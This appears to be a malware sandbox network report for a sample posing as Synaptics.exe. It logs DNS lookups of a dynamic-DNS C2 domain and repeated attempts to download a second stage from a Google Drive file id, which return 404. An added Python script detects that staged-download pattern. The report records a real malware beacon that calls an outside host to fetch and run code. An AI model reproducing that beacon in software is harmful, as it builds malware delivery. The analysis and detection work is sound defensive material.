Dec 30, 2024 11:25:21.985191107 CET | 192.168.2.8 | 1.1.1.1 | 0x93f8 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:28.658093929 CET | 192.168.2.8 | 1.1.1.1 | 0x4e05 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:35.471853971 CET | 192.168.2.8 | 1.1.1.1 | 0xaf1a | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 30, 2024 11:25:20.704998016 CET | 1.1.1.1 | 192.168.2.8 | 0x679b | No error (0) | docs.google.com | | 216.58.206.46 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:21.819281101 CET | 1.1.1.1 | 192.168.2.8 | 0x470e | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:21.985778093 CET | 1.1.1.1 | 192.168.2.8 | 0x91a4 | No error (0) | freedns.afraid.org | | 69.42.215.252 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:21.991914988 CET | 1.1.1.1 | 192.168.2.8 | 0x93f8 | No error (0) | drive.usercontent.google.com | | 172.217.16.193 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:28.665427923 CET | 1.1.1.1 | 192.168.2.8 | 0x4e05 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:25:35.479656935 CET | 1.1.1.1 | 192.168.2.8 | 0xaf1a | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:26:23.105809927 CET | 1.1.1.1 | 192.168.2.8 | 0x88a1 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 30, 2024 11:26:23.105809927 CET | 1.1.1.1 | 192.168.2.8 | 0x88a1 | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
• docs.google.com
• drive.usercontent.google.com
• freedns.afraid.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49714 | 69.42.215.252 | 80 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
Dec 30, 2024 11:25:21.993675947 CET | 154 | OUT | GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
User-Agent: MyApp
Host: freedns.afraid.org
Cache-Control: no-cache
Dec 30, 2024 11:25:22.585627079 CET | 243 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 30 Dec 2024 10:25:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Cache: MISS
Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1fERROR: Could not authenticate.0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.8  49710        216.58.206.46   443               6892  C:\ProgramData\Synaptics\Synaptics.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:25:21 UTC  143                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
2024-12-30 10:25:21 UTC  1314               IN         HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:21 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: script-src 'report-sample' 'nonce-DoQmBt1SPEL4HYvTjrloLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.8  49709        216.58.206.46   443               6892  C:\ProgramData\Synaptics\Synaptics.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:25:21 UTC  143                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
2024-12-30 10:25:21 UTC  1314               IN         HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:21 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: script-src 'report-sample' 'nonce-WnlhQ8F_EPL6M7jOf6IDvw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.8  49713        216.58.206.46   443               6892  C:\ProgramData\Synaptics\Synaptics.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:25:22 UTC  143                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
2024-12-30 10:25:22 UTC  1314               IN         HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:22 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Security-Policy: script-src 'report-sample' 'nonce-6UYzJjcsywpD3sPRHcJhug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.8  49717        172.217.16.193  443               6892  C:\ProgramData\Synaptics\Synaptics.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:25:22 UTC  186                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
2024-12-30 10:25:23 UTC  1602               IN         HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC5vTJUCokayzFTP24RzbZ2wteZ20PKJV_fGCGsI5ZKibDC2htAkWmYVejsRudU-tovVt7UR7xo
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:22 GMT
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy: script-src 'report-sample' 'nonce-DRrxHvSvU9zHAJbbqvNwNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Length: 1652
    Server: UploadServer
    Set-Cookie: NID=520=VL_GHZV1e_y-7-YB2QhgR7m41cVMxQehDrS9YBmiQePvr4mGlbgJWI4frSdZlJpHQfJBXPaJRMtMOz-UlrnyXePV6GErcwoBgK_mJp59isaoCyA6TPNmmXhLo_HbqvVx5bRNbysM9xEJdnROQz30aVMRuLtW1PCVTQponmnCmpzk3I1sm9gCaXPs; expires=Tue, 01-Jul-2025 10:25:22 GMT; path=/; domain=.google.com; HttpOnly
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2024-12-30 10:25:23 UTC  1602               IN         Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 58 37 39 4a 4e 38 6d 33 64 5a 4c 39 62 41 39 57 75 58 7a 77 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fX79JN8m3dZL9bA9WuXzwA">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 10:25:23 UTC  50                 IN         Data Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
    Data Ascii: is server. <ins>That’s all we know.</ins></main>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.8  49715        216.58.206.46   443               6892  C:\ProgramData\Synaptics\Synaptics.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:25:22 UTC  143                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
2024-12-30 10:25:22 UTC  1314               IN         HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:22 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Security-Policy: script-src 'report-sample' 'nonce-TkGgOMQFTBl4dfmJaavWWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.8  49716        172.217.16.193  443               6892  C:\ProgramData\Synaptics\Synaptics.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:25:22 UTC  186                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
2024-12-30 10:25:23 UTC  1602               IN         HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC4cf_z3n1BDw5Qh2EQBJ6xGeU9lY2ZnDnd9NoVOrZ2ifvRAgR3vDZ3FmsLVjttN80L2fwCH26I
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:23 GMT
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-TozIE_lRoF7EJIy03p7EsQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Length: 1652
    Server: UploadServer
    Set-Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8; expires=Tue, 01-Jul-2025 10:25:22 GMT; path=/; domain=.google.com; HttpOnly
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2024-12-30 10:25:23 UTC  1602               IN         Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 7a 73 6b 47 4c 78 30 70 69 72 54 37 34 30 62 48 65 78 6c 61 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tzskGLx0pirT740bHexlaA">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 10:25:23 UTC  50                 IN         Data Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
    Data Ascii: is server. <ins>That’s all we know.</ins></main>
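The sessions above show the second-stage fetch of the dropped Synaptics.exe: a GET to docs.google.com /uc?id=...&export=download with the binary's own file name as User-Agent, a 303 to drive.usercontent.google.com, and a 404 because the file behind the id is gone. The following is an added detection example, not part of the Joe Sandbox report and not code from the sample. SESSIONS is constructed from captured sessions 0, 2 and 3 (same hosts, paths, User-Agent, status codes and process path) with the header lists trimmed to what the rules use; the rule names, the "executable-as-User-Agent" heuristic and the redirect/success status sets are this example's own assumptions.

```python
"""Flag the Google Drive staged-download pattern shown in the sessions above.

Added example, not part of the Joe Sandbox report. SESSIONS is constructed
from captured sessions 0, 2 and 3; rule names and status sets are assumptions.
"""
import re
from urllib.parse import parse_qs, urlsplit

FILE_ID = "0BxsMXGfPIZfSVlVsOGlEVGxuZVk"          # id from the captured requests
SAMPLE_PROCESS = r"C:\ProgramData\Synaptics\Synaptics.exe"

def _docs_session(sid):
    """Constructed copy of the docs.google.com 303 exchange (sessions 0 and 2)."""
    return {"sid": sid, "process": SAMPLE_PROCESS,
            "request": (f"GET /uc?id={FILE_ID}&export=download HTTP/1.1\r\n"
                        "User-Agent: Synaptics.exe\r\nHost: docs.google.com\r\n"
                        "Cache-Control: no-cache\r\n\r\n"),
            "response": ("HTTP/1.1 303 See Other\r\nContent-Type: application/binary\r\n"
                         "Location: https://drive.usercontent.google.com/download"
                         f"?id={FILE_ID}&export=download\r\nContent-Length: 0\r\n\r\n")}

SESSIONS = [                                     # constructed sample, see docstring
    _docs_session(0),
    _docs_session(2),
    {"sid": 3, "process": SAMPLE_PROCESS,
     "request": (f"GET /download?id={FILE_ID}&export=download HTTP/1.1\r\n"
                 "User-Agent: Synaptics.exe\r\nCache-Control: no-cache\r\n"
                 "Host: drive.usercontent.google.com\r\nConnection: Keep-Alive\r\n\r\n"),
     "response": ("HTTP/1.1 404 Not Found\r\nContent-Type: text/html; charset=utf-8\r\n"
                  "Content-Length: 1652\r\n\r\n<title>Error 404 (Not Found)!!1</title>")},
]

# The dropped binary sends its own file name as User-Agent. Assumption: no
# legitimate client on the monitored hosts uses a bare "<name>.exe" UA.
EXE_USER_AGENT = re.compile(r"^[\w.-]+\.exe$", re.IGNORECASE)
DRIVE_HOSTS = {"docs.google.com", "drive.google.com", "drive.usercontent.google.com"}
REDIRECT_STATUSES = {301, 302, 303, 307, 308}
SUCCESS_STATUSES = {200, 206}

def _parse_http(raw):
    """Split one HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def parse_request(raw):
    start, headers, _ = _parse_http(raw)
    method, target, _ = start.split(" ", 2)
    return {"method": method, "target": target, "headers": headers}

def parse_response(raw):
    start, headers, body = _parse_http(raw)
    return {"status": int(start.split(" ", 2)[1]), "headers": headers, "body": body}

def drive_file_id(host, target):
    """Return the Drive file id for a direct-download request, else None."""
    if host not in DRIVE_HOSTS:
        return None
    parts = urlsplit(target)
    if parts.path not in ("/uc", "/download"):
        return None
    query = parse_qs(parts.query)
    if query.get("export") != ["download"]:
        return None
    return query["id"][0] if query.get("id") else None

def analyze(sessions):
    """Correlate per Drive file id: request count, redirects, terminal statuses."""
    findings = {"exe_user_agents": set(), "downloads": {}}
    for s in sessions:
        req, resp = parse_request(s["request"]), parse_response(s["response"])
        ua = req["headers"].get("user-agent", "")
        if EXE_USER_AGENT.match(ua):
            findings["exe_user_agents"].add(ua)
        fid = drive_file_id(req["headers"].get("host", ""), req["target"])
        if fid is None:
            continue
        d = findings["downloads"].setdefault(
            fid, {"requests": 0, "redirects": 0, "final_statuses": set(), "processes": set()})
        d["requests"] += 1
        d["processes"].add(s["process"])
        if resp["status"] in REDIRECT_STATUSES:
            d["redirects"] += 1
        else:
            d["final_statuses"].add(resp["status"])
    return findings

def payload_retrieved(findings, fid):
    """True only if a terminal response for this file id carried content."""
    d = findings["downloads"].get(fid)
    return bool(d and d["final_statuses"] & SUCCESS_STATUSES)

def report(findings):
    """One line per Drive file id touched by a flagged client."""
    lines = []
    for fid, d in sorted(findings["downloads"].items()):
        state = "retrieved" if payload_retrieved(findings, fid) else "not retrieved"
        lines.append(f"drive id {fid}: {d['requests']} request(s), {d['redirects']} redirect(s), "
                     f"final status {sorted(d['final_statuses'])}, payload {state}; "
                     f"UA {sorted(findings['exe_user_agents'])}; process {sorted(d['processes'])}")
    return lines

if __name__ == "__main__":
    for line in report(analyze(SESSIONS)):
        print(line)
```

Run stand-alone it prints one line for the captured file id: three requests, two redirects, final status 404, payload not retrieved. The point of keying on the file id rather than on the 404 is that the beacon is the detection: the same client fetching the same id repeatedly with a bare .exe User-Agent is worth an alert whether or not the stage is still hosted, and the terminal status only tells you whether you also have a downloaded artifact to go and find on disk.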


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49719 | 216.58.206.46 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:23 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2024-12-30 10:25:23 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 10:25:23 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-4ZkOl0LQYY2uaFqPhKG1mA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49720 | 216.58.206.46 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:23 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2024-12-30 10:25:23 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 10:25:23 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-O1Sow3fopoYVtPuy3F_Fjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 49721 | 172.217.16.193 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:23 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
2024-12-30 10:25:24 UTC | 1594 | IN | HTTP/1.1 404 Not Found
X-GUploader-UploadID: AFiumC65RFh1stQNMiWIKh7_BpboglpkHG_1DoAe_alA7r-4gAEOC-RSWDLn-gSgoAvavu2l
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 10:25:23 GMT
